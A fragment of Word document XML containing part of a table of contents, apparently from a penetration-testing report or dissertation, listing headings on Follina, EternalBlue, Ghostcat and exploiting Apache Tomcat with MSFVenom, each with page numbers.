              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190752" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>PHASE 1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190752 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>79</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7956276D" w14:textId="1E8A13BC" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190753" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Run GVM via the VPN</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190753 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>79</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="79337628" w14:textId="666913F9" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190754" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>PHASE TWO</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190754 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>83</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4648DC95" w14:textId="4A22ED8D" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190755" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Follina – CVE 2022-30190 – Severity Level 7.8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190755 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>83</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="74432A4D" w14:textId="36997613" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190756" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>OS End of Life: EternalBlue – Severity Level 10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190756 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>88</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4FBAB492" w14:textId="2B7D6537" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190757" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Ghostcat: CVE 2020-1938 – Severity Level 9.8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190757 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>95</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="48AE34C2" w14:textId="4FC4C81F" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190758" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Jerry with MSFVenom on Apache Tomcat</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190758 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>104</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5E2AC9A5" w14:textId="15C2B927" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190759" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CHAPTER 6: DISCUSSION AND ANALYSIS OF RESULTS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190759 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>110</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2A86B09C" w14:textId="1EC3D442" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190760" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CHAPTER 7: CONCLUSION AND RECOMMENDATIONS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190760 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>113</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0C321935" w14:textId="1D20A097" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190761" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Conclusion</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190761 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>113</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="78FDB322" w14:textId="50D26028" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190762" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">7.2 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Recommendations</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190762 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>114</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="37CE17FD" w14:textId="0CA81D37" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190763" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CHAPTER 8: REFLECTIONS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190763 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>115</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="787B0977" w14:textId="03480EEF" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190764" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CHAPTER 9: BIBLIOGRAPHY</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190764 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>116</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="23272227" w14:textId="6F73B1D9" w:rsidR="00F93DB2" w:rsidRDefault="00F93DB2">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc113190765" w:history="1">
            <w:r w:rsidRPr="00103095">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CHAPTER 10: APPENDIX 1 – FUNCTION’S PSEUDO CODE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc113190765 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>124</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
